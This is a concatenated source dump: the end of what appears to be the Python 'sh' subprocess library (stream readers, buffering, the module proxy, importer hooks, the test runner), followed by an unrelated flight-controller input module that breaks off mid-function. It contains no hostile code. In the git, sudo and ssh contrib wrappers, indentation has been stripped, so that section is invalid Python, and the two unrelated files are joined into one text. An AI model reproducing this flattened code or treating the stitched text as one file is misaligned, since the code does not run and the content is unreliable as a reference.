    (the stream param). the stdin may be a Queue, a callable, something with
    the "read" method, a string, or an iterable """

    def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
        self.stream = stream          # the child's stdin fd (int)
        self.stdin = stdin            # the user-supplied input object
        self.log = log
        self.encoding = encoding
        self.tty_in = tty_in
        self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
        self.get_chunk, log_msg = determine_how_to_read_input(stdin)
        self.log.debug("parsed stdin as a %s", log_msg)

    def fileno(self):
        """ defining this allows us to do poll on an instance of this
        class """
        return self.stream

    def write(self):
        """ attempt to get a chunk of data to write to our child process's
        stdin, then write it. the return value answers the questions "are we
        done writing forever?" """
        # get_chunk may sometimes return bytes, and sometimes return strings
        # because of the nature of the different types of STDIN objects we
        # support
        try:
            chunk = self.get_chunk()
            if chunk is None:
                raise DoneReadingForever
        except DoneReadingForever:
            self.log.debug("done reading")
            if self.tty_in:
                # EOF time
                try:
                    char = termios.tcgetattr(self.stream)[6][termios.VEOF]
                except:  # noqa: E722
                    char = chr(4).encode()
                # normally, one EOF should be enough to signal to an program
                # that is read()ing, to return 0 and be on your way. however,
                # some programs are misbehaved, like python3.1 and python3.2.
                # they don't stop reading sometimes after read() returns 0.
                # this can be demonstrated with the following program:
                #
                # import sys
                # sys.stdout.write(sys.stdin.read())
                #
                # then type 'a' followed by ctrl-d 3 times. in python
                # 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
                # however, in python 3.1 and 3.2, it takes all 3.
                #
                # so here we send an extra EOF along, just in case. i don't
                # believe it can hurt anything
                os.write(self.stream, char)
                os.write(self.stream, char)
            return True
        except NotYetReadyToRead:
            self.log.debug("received no data")
            return False
        # if we're not bytes, make us bytes
        if IS_PY3 and not isinstance(chunk, bytes):
            chunk = chunk.encode(self.encoding)
        for proc_chunk in self.stream_bufferer.process(chunk):
            self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30])
            self.log.debug("writing chunk to process")
            try:
                os.write(self.stream, proc_chunk)
            except OSError:
                # the child has likely closed its stdin; stop writing
                self.log.debug("OSError writing stdin chunk")
                return True

    def close(self):
        """ flush anything left in the bufferer, then close the child's
        stdin fd """
        self.log.debug("closing, but flushing first")
        chunk = self.stream_bufferer.flush()
        self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
        try:
            if chunk:
                os.write(self.stream, chunk)
        except OSError:
            pass
        os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
    """ given a user-specified output handler, return a (process, finish)
    pair of callables. process(chunk) consumes one chunk and returns True
    when the handler wants no more data; finish() is called once at EOF """
    if callable(handler):
        process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors)
    # in py3, this is used for bytes
    elif isinstance(handler, (cStringIO, iocStringIO)):
        process, finish = get_cstringio_chunk_consumer(handler)
    # in py3, this is used for unicode
    elif isinstance(handler, (StringIO, ioStringIO)):
        process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors)
    elif hasattr(handler, "write"):
        process, finish = get_file_chunk_consumer(handler)
    else:
        try:
            handler = int(handler)
        except (ValueError, TypeError):
            # not a handler shape we recognize: silently discard the output
            def process(chunk): return False  # noqa: E731
            def finish(): return None  # noqa: E731
        else:
            # an integer handler is treated as a raw file descriptor
            process, finish = get_fd_chunk_consumer(handler)
    return process, finish
def get_fd_chunk_consumer(handler):
    """ wrap a raw integer fd in a file object (closefd=False so the fd
    itself is left open) and delegate to the file-chunk consumer """
    handler = fdopen(handler, "w", closefd=False)
    return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
    """Return (process, finish) callables that write chunks to the
    file-like *handler*, decoding bytes to text first when the handler
    declares an encoding (i.e. it is a text-mode file)."""
    if getattr(handler, "encoding", None):
        def convert(chunk): return chunk.decode(handler.encoding)  # noqa: E731
    else:
        def convert(chunk): return chunk  # noqa: E731

    if hasattr(handler, "flush"):
        flush = handler.flush
    else:
        def flush(): return None  # noqa: E731

    def process(chunk):
        handler.write(convert(chunk))
        # we should flush on an fd. chunk is already the correctly-buffered
        # size, so we don't need the fd buffering as well
        flush()
        return False

    def finish():
        flush()

    return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
    """Return (process, finish) for a callable handler.

    Chunks are decoded with *encoding* when possible; data that fails to
    decode is handed to the callback as raw bytes (it might be binary).
    """
    def process(chunk):
        try:
            decoded = chunk.decode(encoding, decode_errors)
        except UnicodeDecodeError:
            decoded = chunk
        return handler(decoded)

    def finish():
        pass

    return process, finish
def get_cstringio_chunk_consumer(handler):
    """Return (process, finish) that write raw byte chunks into *handler*."""
    def write_chunk(chunk):
        handler.write(chunk)
        return False

    def no_op():
        pass

    return write_chunk, no_op
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
    """Return (process, finish) that decode byte chunks with *encoding*
    and write the resulting text into *handler*."""
    def write_chunk(chunk):
        text = chunk.decode(encoding, decode_errors)
        handler.write(text)
        return False

    def no_op():
        pass

    return write_chunk, no_op
class StreamReader(object):
    """ reads from some output (the stream) and sends what it just read to the
    handler. """

    def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None,
                 save_data=True):
        self.stream = stream          # the fd we read the child's output from
        self.buffer = buffer          # aggregation deque shared with OProc
        self.save_data = save_data
        self.encoding = encoding
        self.decode_errors = decode_errors
        self.pipe_queue = None
        if pipe_queue:
            # held weakly so this reader doesn't keep the pipe queue alive
            self.pipe_queue = weakref.ref(pipe_queue)
        self.log = log
        self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors)
        self.bufsize = bufsize_type_to_bufsize(bufsize_type)
        self.process_chunk, self.finish_chunk_processor = \
            determine_how_to_feed_output(handler, encoding, decode_errors)
        # set True once the handler asks to stop receiving chunks
        self.should_quit = False

    def fileno(self):
        """ defining this allows us to do poll on an instance of this
        class """
        return self.stream

    def close(self):
        """ flush buffered data through the handler, signal EOF on the pipe
        queue (with a None sentinel), and close the underlying fd """
        chunk = self.stream_bufferer.flush()
        self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
        if chunk:
            self.write_chunk(chunk)
        self.finish_chunk_processor()
        if self.pipe_queue and self.save_data:
            self.pipe_queue().put(None)
        os.close(self.stream)

    def write_chunk(self, chunk):
        """ feed one chunk to the handler, aggregate it, and forward it to
        the pipe queue """
        # in PY3, the chunk coming in will be bytes, so keep that in mind
        if not self.should_quit:
            self.should_quit = self.process_chunk(chunk)
        if self.save_data:
            self.buffer.append(chunk)
            if self.pipe_queue:
                self.log.debug("putting chunk onto pipe: %r", chunk[:30])
                self.pipe_queue().put(chunk)

    def read(self):
        """ read one bufsize-d chunk from the fd and dispatch it. returns
        True once reading is finished (EOF or a read error) """
        # if we're PY3, we're reading bytes, otherwise we're reading
        # str
        try:
            chunk = no_interrupt(os.read, self.stream, self.bufsize)
        except OSError as e:
            self.log.debug("got errno %d, done reading", e.errno)
            return True
        if not chunk:
            self.log.debug("got no chunk, done reading")
            return True
        self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
        for chunk in self.stream_bufferer.process(chunk):
            self.write_chunk(chunk)
class StreamBufferer(object):
    """ this is used for feeding in chunks of stdout/stderr, and breaking it up
    into chunks that will actually be put into the internal buffers. for
    example, if you have two processes, one being piped to the other, and you
    want that, first process to feed lines of data (instead of the chunks
    however they come in), OProc will use an instance of this class to chop up
    the data and feed it as lines to be sent down the pipe """

    def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"):
        # 0 for unbuffered, 1 for line, everything else for that amount
        self.type = buffer_type
        self.buffer = []              # partial data awaiting a newline/full block
        self.n_buffer_count = 0       # byte count of self.buffer's contents
        self.encoding = encoding
        self.decode_errors = decode_errors
        # this is for if we change buffering types. if we change from line
        # buffered to unbuffered, its very possible that our self.buffer list
        # has data that was being saved up (while we searched for a newline).
        # we need to use that up, so we don't lose it
        self._use_up_buffer_first = False
        # the buffering lock is used because we might change the buffering
        # types from a different thread. for example, if we have a stdout
        # callback, we might use it to change the way stdin buffers. so we
        # lock
        self._buffering_lock = threading.RLock()
        self.log = Logger("stream_bufferer")

    def change_buffering(self, new_type):
        """ thread-safely switch to a new buffering type """
        # TODO, when we stop supporting 2.6, make this a with context
        self.log.debug("acquiring buffering lock for changing buffering")
        self._buffering_lock.acquire()
        self.log.debug("got buffering lock for changing buffering")
        try:
            if new_type == 0:
                self._use_up_buffer_first = True
            self.type = new_type
        finally:
            self._buffering_lock.release()
            self.log.debug("released buffering lock for changing buffering")

    def process(self, chunk):
        """ split the incoming chunk according to the current buffering type
        and return the list of chunks ready to be written out; bytes that do
        not yet complete a line/block stay in self.buffer """
        # MAKE SURE THAT THE INPUT IS PY3 BYTES
        # THE OUTPUT IS ALWAYS PY3 BYTES
        # TODO, when we stop supporting 2.6, make this a with context
        self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
        self._buffering_lock.acquire()
        self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
        try:
            # unbuffered
            if self.type == 0:
                if self._use_up_buffer_first:
                    self._use_up_buffer_first = False
                    to_write = self.buffer
                    self.buffer = []
                    to_write.append(chunk)
                    return to_write
                return [chunk]
            # line buffered
            elif self.type == 1:
                total_to_write = []
                nl = "\n".encode(self.encoding)
                while True:
                    newline = chunk.find(nl)
                    if newline == -1:
                        break
                    chunk_to_write = chunk[:newline + 1]
                    if self.buffer:
                        chunk_to_write = b"".join(self.buffer) + chunk_to_write
                        self.buffer = []
                        self.n_buffer_count = 0
                    chunk = chunk[newline + 1:]
                    total_to_write.append(chunk_to_write)
                if chunk:
                    self.buffer.append(chunk)
                    self.n_buffer_count += len(chunk)
                return total_to_write
            # N size buffered
            else:
                total_to_write = []
                while True:
                    overage = self.n_buffer_count + len(chunk) - self.type
                    if overage >= 0:
                        ret = "".encode(self.encoding).join(self.buffer) + chunk
                        chunk_to_write = ret[:self.type]
                        chunk = ret[self.type:]
                        total_to_write.append(chunk_to_write)
                        self.buffer = []
                        self.n_buffer_count = 0
                    else:
                        self.buffer.append(chunk)
                        self.n_buffer_count += len(chunk)
                        break
                return total_to_write
        finally:
            self._buffering_lock.release()
            self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)

    def flush(self):
        """ return everything currently held back in the buffer, clearing it """
        self.log.debug("acquiring buffering lock for flushing buffer")
        self._buffering_lock.acquire()
        self.log.debug("got buffering lock for flushing buffer")
        try:
            ret = "".encode(self.encoding).join(self.buffer)
            self.buffer = []
            return ret
        finally:
            self._buffering_lock.release()
            self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
    """ decorator factory: turns a generator function into a context manager
    whose body runs while holding *lock* """
    def wrapped(fn):
        fn = contextmanager(fn)

        @contextmanager
        def wrapped2(*args, **kwargs):
            with lock:
                with fn(*args, **kwargs):
                    yield
        return wrapped2
    return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
    """ pushd changes the actual working directory for the duration of the
    context, unlike the _cwd arg this will work with other built-ins such as
    sh.glob correctly """
    orig_path = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        # always restore the original cwd, even if the body raised
        os.chdir(orig_path)
@contextmanager
def _args(**kwargs):
    """ allows us to temporarily override all the special keyword parameters in
    a with context.

    deprecated: calling this always raises immediately with migration
    instructions (note it raises DeprecationWarning rather than warning) """
    kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()])
    raise DeprecationWarning("""
    sh.args() has been deprecated because it was never thread safe. use the
    following instead:
    sh2 = sh({kwargs})
    sh2.your_command()
    or
    sh2 = sh({kwargs})
    from sh2 import your_command
    your_command()
    """.format(kwargs=kwargs_str))
class Environment(dict):
    """ this allows lookups to names that aren't found in the global scope to be
    searched for as a program name. for example, if "ls" isn't found in this
    module's scope, we consider it a system program and try to find it.
    we use a dict instead of just a regular object as the base class because the
    exec() statement used in the run_repl requires the "globals" argument to be a
    dictionary """
    # this is a list of all of the names that the sh module exports that will
    # not resolve to functions. we don't want to accidentally shadow real
    # commands with functions/imports that we define in sh.py. for example,
    # "import time" may override the time system program
    whitelist = set((
        "Command",
        "RunningCommand",
        "CommandNotFound",
        "DEFAULT_ENCODING",
        "DoneReadingForever",
        "ErrorReturnCode",
        "NotYetReadyToRead",
        "SignalException",
        "ForkException",
        "TimeoutException",
        "StreamBufferer",
        "__project_url__",
        "__version__",
        "__file__",
        "_args",
        "pushd",
        "glob",
        "contrib",
    ))

    def __init__(self, globs, baked_args=None):
        """ baked_args are defaults for the 'sh' execution context. for
        example:
        tmp = sh(_out=StringIO())
        'out' would end up in here as an entry in the baked_args dict """
        super(dict, self).__init__()
        self.globs = globs
        self.baked_args = baked_args or {}

    def __getitem__(self, k):
        """ the lookup protocol: resolve *k*, in order, as a whitelisted real
        name, a dynamically generated ReturnCode exception, a custom builtin,
        a system command, and finally an environment variable; otherwise
        raise CommandNotFound """
        if k == 'args':
            # Let the deprecated '_args' context manager be imported as 'args'
            k = '_args'
        # if we're trying to import something real, see if it's in our global scope.
        # what defines "real" is that it's in our whitelist
        if k in self.whitelist:
            return self.globs[k]
        # somebody tried to be funny and do "from sh import *"
        if k == "__all__":
            warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
            return []
        # check if we're naming a dynamically generated ReturnCode exception
        exc = get_exc_from_name(k)
        if exc:
            return exc
        # https://github.com/ipython/ipython/issues/2577
        # https://github.com/amoffat/sh/issues/97#issuecomment-10610629
        if k.startswith("__") and k.endswith("__"):
            raise AttributeError
        # is it a custom builtin?
        builtin = getattr(self, "b_" + k, None)
        if builtin:
            return builtin
        # is it a command?
        cmd = resolve_command(k, self.baked_args)
        if cmd:
            return cmd
        # how about an environment variable?
        # this check must come after testing if its a command, because on some
        # systems, there are an environment variables that can conflict with
        # command names.
        # https://github.com/amoffat/sh/issues/238
        try:
            return os.environ[k]
        except KeyError:
            pass
        # nothing found, raise an exception
        raise CommandNotFound(k)

    # methods that begin with "b_" are custom builtins and will override any
    # program that exists in our path. this is useful for things like
    # common shell builtins that people are used to, but which aren't actually
    # full-fledged system binaries
    @staticmethod
    def b_cd(path=None):
        """ builtin cd: change directory, defaulting to the user's home """
        if path:
            os.chdir(path)
        else:
            os.chdir(os.path.expanduser('~'))

    @staticmethod
    def b_which(program, paths=None):
        """ builtin which: delegate to the module-level which() helper """
        return which(program, paths)
class Contrib(ModuleType):  # pragma: no cover
    """ a module-like registry of pre-tweaked commands. using the instance as
    a decorator (@contrib("name")) installs a lazy property on this class
    that resolves the real command at access time and applies the decorated
    wrapper to it """
    @classmethod
    def __call__(cls, name):
        def wrapper1(fn):
            # resolved lazily so the command need not exist at import time
            @property
            def cmd_getter(self):
                cmd = resolve_command(name)
                if not cmd:
                    raise CommandNotFound(name)
                new_cmd = fn(cmd)
                return new_cmd
            setattr(cls, name, cmd_getter)
            return fn
        return wrapper1
# register the Contrib instance in sys.modules under "<this module>.contrib",
# which appears to make "from sh.contrib import git" style imports work
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(a, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return a, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(a, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731
if password is None:
def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731
else:
def pass_getter(): return password.rstrip("\n") # noqa: E731
if login_success is None:
def login_success(content): return True # noqa: E731
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return a, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
def run_repl(env):  # pragma: no cover
    """Run a minimal read-eval-print loop whose namespace is *env*.

    NOTE(review): relies on a ``raw_input`` name (py2 builtin / py3 alias)
    being defined elsewhere in this module — confirm before reuse.
    """
    banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
    print(banner.format(version=__version__))
    while True:
        try:
            line = raw_input("sh> ")
        except (ValueError, EOFError):
            # EOF (ctrl-d) leaves the repl
            break
        try:
            exec(compile(line, "<dummy>", "single"), env, env)
        except SystemExit:
            break
        except:  # noqa: E722
            # show the traceback but keep the repl alive
            print(traceback.format_exc())
    # cleans up our last line
    print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
    """Module proxy installed into sys.modules in place of this module.

    Attribute access resolves commands dynamically through an Environment
    (so ``from sh import ls`` works), and calling the module object yields a
    new context whose spawned commands carry baked default kwargs.
    """
    def __init__(self, self_module, baked_args=None):
        # this is super ugly to have to copy attributes like this,
        # but it seems to be the only way to make reload() behave
        # nicely. if i make these attributes dynamic lookups in
        # __getattr__, reload sometimes chokes in weird ways...
        super(SelfWrapper, self).__init__(
            name=getattr(self_module, '__name__', None),
            doc=getattr(self_module, '__doc__', None)
        )
        for attr in ["__builtins__", "__file__", "__package__"]:
            setattr(self, attr, getattr(self_module, attr, None))
        # python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
        # if we set this to None. and 3.3 needs a value for __path__
        self.__path__ = []
        self.__self_module = self_module
        self.__env = Environment(globals(), baked_args=baked_args)

    def __getattr__(self, name):
        # every unknown attribute becomes a lookup in the Environment
        return self.__env[name]

    def __call__(self, **kwargs):
        """ returns a new SelfWrapper object, where all commands spawned from it
        have the baked_args kwargs set on them by default """
        baked_args = self.__env.baked_args.copy()
        baked_args.update(kwargs)
        new_mod = self.__class__(self.__self_module, baked_args)
        # inspect the line in the parent frame that calls and assigns the new sh
        # variable, and get the name of the new variable we're assigning to.
        # this is very brittle and pretty much a sin. but it works in 99% of
        # the time and the tests pass
        #
        # the reason we need to do this is because we need to remove the old
        # cached module from sys.modules. if we don't, it gets re-used, and any
        # old baked params get used, which is not what we want
        parent = inspect.stack()[1]
        try:
            code = parent[4][0].strip()
        except TypeError:
            # On the REPL or from the commandline, we don't get the source code in the
            # top stack frame
            # Older versions of pypy don't set parent[1] the same way as CPython or newer versions
            # of Pypy so we have to special case that too.
            if parent[1] in ('<stdin>', '<string>') or (
                    parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
                # This depends on things like Python's calling convention and the layout of stack
                # frames but it's a fix for a bug in a very cornery cornercase so....
                module_name = parent[0].f_code.co_names[-1]
            else:
                raise
        else:
            parsed = ast.parse(code)
            try:
                module_name = parsed.body[0].targets[0].id
            except Exception:
                # Diagnose what went wrong
                if not isinstance(parsed.body[0], ast.Assign):
                    raise RuntimeError("A new execution context must be assigned to a variable")
                raise
        if module_name == __name__:
            raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
        # evict the old cached module so the new baked args take effect
        sys.modules.pop(module_name, None)
        return new_mod
def in_importlib(frame):
    """Return True when *frame* belongs to importlib's frozen bootstrap."""
    filename = frame.f_code.co_filename
    return filename == "<frozen importlib._bootstrap>"
def register_importer():
    """ registers our fancy importer that can let us import from a module name,
    like:

        import sh
        tmp = sh()
        from tmp import ls

    Returns True when the importer was newly installed, False when one was
    already present on sys.meta_path.
    """
    def is_ours(entry):
        try:
            return entry.__class__.__name__ == ModuleImporterFromVariables.__name__
        except AttributeError:
            # ran into importer which is not a class instance
            return False

    if any(is_ours(entry) for entry in sys.meta_path):
        return False

    importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__])
    sys.meta_path.insert(0, importer)
    return True
def fetch_module_from_frame(name, frame):
    """Look up *name* in the frame's locals first, then globals; None if absent."""
    if name in frame.f_locals:
        return frame.f_locals[name]
    return frame.f_globals.get(name, None)
class ModuleImporterFromVariables(object):
    """ a fancy importer that allows us to import from a variable that was
    recently set in either the local or global scope, like this:

        sh2 = sh(_timeout=3)
        from sh2 import ls
    """

    def __init__(self, restrict_to=None):
        # only variables whose value's class name is in this set may be
        # imported from (e.g. {"SelfWrapper"})
        self.restrict_to = set(restrict_to or set())

    def find_module(self, mod_fullname, path=None):
        """ mod_fullname doubles as the name of the VARIABLE holding our new sh
        context. for example:
            derp = sh()
            from derp import ls
        here, mod_fullname will be "derp". keep that in mind as we go through
        the rest of this function """
        parent_frame = inspect.currentframe().f_back
        # when invoked through find_spec() below, skip that extra frame
        if parent_frame and parent_frame.f_code.co_name == "find_spec":
            parent_frame = parent_frame.f_back
        # skip importlib's own bootstrap frames to find the real caller
        while parent_frame and in_importlib(parent_frame):
            parent_frame = parent_frame.f_back
        # Calling PyImport_ImportModule("some_module"); via the C API may not
        # have a parent frame. Early-out to avoid in_importlib() trying to
        # get f_code from None when looking for 'some_module'.
        # This also happens when using gevent apparently.
        if not parent_frame:
            return None
        # this line is saying "hey, does mod_fullname exist as a name we've
        # defined previously?" the purpose of this is to ensure that
        # mod_fullname is really a thing we've defined. if we haven't defined
        # it before, then we "can't" import from it
        module = fetch_module_from_frame(mod_fullname, parent_frame)
        if not module:
            return None
        # make sure it's a class we're allowed to import from
        if module.__class__.__name__ not in self.restrict_to:
            return None
        return self

    def find_spec(self, fullname, path=None, target=None):
        """ find_module() is deprecated since Python 3.4 in favor of find_spec() """
        from importlib.machinery import ModuleSpec
        found = self.find_module(fullname, path)
        return ModuleSpec(fullname, found) if found is not None else None

    def load_module(self, mod_fullname):
        parent_frame = inspect.currentframe().f_back
        while in_importlib(parent_frame):
            parent_frame = parent_frame.f_back
        module = fetch_module_from_frame(mod_fullname, parent_frame)
        # we HAVE to include the module in sys.modules, per the import PEP.
        # older versions of python were more lenient about this being set, but
        # not in >= python3.3, unfortunately. this requirement necessitates the
        # ugly code in SelfWrapper.__call__
        sys.modules[mod_fullname] = module
        module.__loader__ = self
        return module
def run_tests(env, locale, a, version, force_select, **extra_env):  # pragma: no cover
    """Spawn test.py under one python version/locale combination.

    Returns the child's exit code, or None if that interpreter isn't
    installed.  *a* is the raw argv whose tail is forwarded to test.py;
    *extra_env* entries are stringified into the child environment.
    """
    interpreter = "python" + str(version)
    binary = which(interpreter)
    poller = "select" if force_select else "poll"
    exit_code = None

    if binary:
        print("Testing %s, locale %r, poller: %s" % (interpreter.capitalize(), locale, poller))

        env["SH_TESTS_USE_SELECT"] = str(int(force_select))
        env["LANG"] = locale
        for key, value in extra_env.items():
            env[key] = str(value)

        cmd = [binary, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + a[1:]
        print("Running %r" % cmd)
        exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, env)

    return exit_code
def main():  # pragma: no cover
    """CLI driver: with 'test'/'travis'/'tox' run the test matrix across
    python versions and locales; with no action, start the interactive repl."""
    from optparse import OptionParser
    parser = OptionParser()
    parser.add_option("-e", "--envs", dest="envs", default=None, action="append")
    parser.add_option("-l", "--locales", dest="constrain_locales", default=None, action="append")
    options, parsed_args = parser.parse_args()
    # these are essentially restrictions on what envs/constrain_locales to restrict to for
    # the tests. if they're empty lists, it means use all available
    action = None
    if parsed_args:
        action = parsed_args[0]
    if action in ("test", "travis", "tox"):
        import test
        coverage = None
        # coverage is optional; only used when the test module supports it
        if test.HAS_UNICODE_LITERAL:
            try:
                import coverage
            except ImportError:
                pass
        env = os.environ.copy()
        env["SH_TESTS_RUNNING"] = "1"
        if coverage:
            test.append_module_path(env, coverage)
        # if we're testing locally, run all versions of python on the system
        if action == "test":
            all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
        # if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
        # python version in our .travis.yml file, and tox will run its matrix via tox.ini
        else:
            v = sys.version_info
            sys_ver = "%d.%d" % (v[0], v[1])
            all_versions = (sys_ver,)
        # exercise both pollers when poll() is available
        all_force_select = [True]
        if HAS_POLL:
            all_force_select.append(False)
        all_locales = ("en_US.UTF-8", "C")
        i = 0
        ran_versions = set()
        for locale in all_locales:
            # make sure this locale is allowed
            if options.constrain_locales and locale not in options.constrain_locales:
                continue
            for version in all_versions:
                # make sure this version is allowed
                if options.envs and version not in options.envs:
                    continue
                for force_select in all_force_select:
                    env_copy = env.copy()
                    ran_versions.add(version)
                    exit_code = run_tests(env_copy, locale, parsed_args, version, force_select, SH_TEST_RUN_IDX=i)
                    # None means the interpreter isn't installed; skip it
                    if exit_code is None:
                        print("Couldn't find %s, skipping" % version)
                    elif exit_code != 0:
                        print("Failed for %s, %s" % (version, locale))
                        exit(1)
                    i += 1
        print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
    else:
        # no recognized action: drop into the interactive repl
        env = Environment(globals())
        run_repl(env)
if __name__ == "__main__":  # pragma: no cover
    # we're being run as a stand-alone script
    main()
else:
    # we're being imported from somewhere: replace this module in sys.modules
    # with the dynamic-lookup proxy and install the meta-path importer so
    # "from <context> import <command>" works
    sys.modules[__name__] = SelfWrapper(sys.modules[__name__])
    register_importer()
|
OutputController.py | import threading
import time
# Keys currently held down by an assync_press thread, used to avoid
# re-pressing a key before its release completes.
running_threads = []
# Digital input index (pin) for each named digital control.
DIGITAL_PORT_MAPPER = { 'GEARS': 2,
                        'LEFT_PEDAL': 3,
                        'RIGHT_PEDAL': 4,
                        'FLAPS': 5,
                        'BRAKE': 6,
                        'AIR_BRAKE': 7,
                        'BOMB': 8,
                        'ROCKET': 9,
                        'JUMP':10,
                        'RELOAD':11,
                        'INIT_GROUND_OR_AIR':12,
                        'DIG_MISC1':13}
# Analog input channel index for each named analog axis.
ANALOG_PORT_MAPPER = { 'THROTTLE': 0,
                       'ELEVATOR': 1,
                       'AILERONS': 2,
                       'RUDDER': 3,
                       'ANALOG_MISC1': 4,
                       'ANALOG_MISC2': 5}
# Keyboard key emitted for each high-level action. ("CONTROLL" [sic] —
# renaming this module-level name would break external users.)
KEYBOARD_CONTROLL = {'TOGGLE_GEARS': 'g'}
class State():
    """Snapshot of one frame of controller input.

    Parameters:
        first: True when this is the first state after a (re)connect.
        serial_input: (digital_values, analog_values) pair from the serial link.
        headset_input: opaque headset data, stored as-is.
        keys: names from DIGITAL_PORT_MAPPER / ANALOG_PORT_MAPPER to expose
              as lowercase attributes on this object (e.g. 'GEARS' -> self.gears).

    Raises:
        Exception: when the analog input does not have exactly 6 channels,
            or a requested key is not in either mapper.
    """

    def __init__(self, first, serial_input, headset_input, keys=()):
        # Fix: the default used to be a mutable list ([]), which is shared
        # across calls — the classic Python mutable-default pitfall. An
        # immutable empty tuple is a backward-compatible replacement.
        self.first = first
        self.digital_input, self.analog_input = serial_input
        self.headset_input = headset_input
        # Plain loop instead of a side-effect-only list comprehension.
        for key in keys:
            self.set_state_by_key(key)
        if len(self.analog_input) != 6: raise Exception('analog size was wrong')

    def set_state_by_key(self, key):
        # Expose the mapped input value as a lowercase attribute.
        if key in DIGITAL_PORT_MAPPER:
            self.__dict__.update({key.lower(): self.digital_input[DIGITAL_PORT_MAPPER[key.upper()]]})
        elif key in ANALOG_PORT_MAPPER:
            self.__dict__.update({key.lower(): self.analog_input[ANALOG_PORT_MAPPER[key.upper()]]})
        else:
            raise Exception('Key not found')

    def __str__(self):
        return str(self.__dict__)

    def __repr__(self):
        return 'State:' + str(self)
class OutputController():
    """Turns controller State transitions into keyboard/mouse output events."""
    def __init__(self, keyboard, mouse):
        # update(None) only resets self.state to None (and returns None)
        self.state = self.update(None)
        self.keyboard = keyboard
        self.mouse = mouse

    def update(self, new_input, headset_input=None):
        """Build a new State from raw inputs and emit outputs for the diffs.

        new_input: (digital_values, analog_values) pair, or None to reset.
        """
        if new_input is None:
            print("Waiting for new inputs") # TODO change to logger
            self.state = None
            return
        first = self.state is None # TODO: check if this is really usefull
        self.old_state = self.state
        self.state = State( first,
                            new_input,
                            headset_input,
                            keys=[ 'GEARS',
                                   'THROTTLE',])
        self.output_over_state_diff(self.state, self.old_state)

    def output_over_state_diff(self, state, old_state):
        # Emit one key tap per changed digital control (only GEARS so far).
        if old_state is None:
            print('TODO old state is None') # TODO old state is None
            return
        if old_state.gears != state.gears:
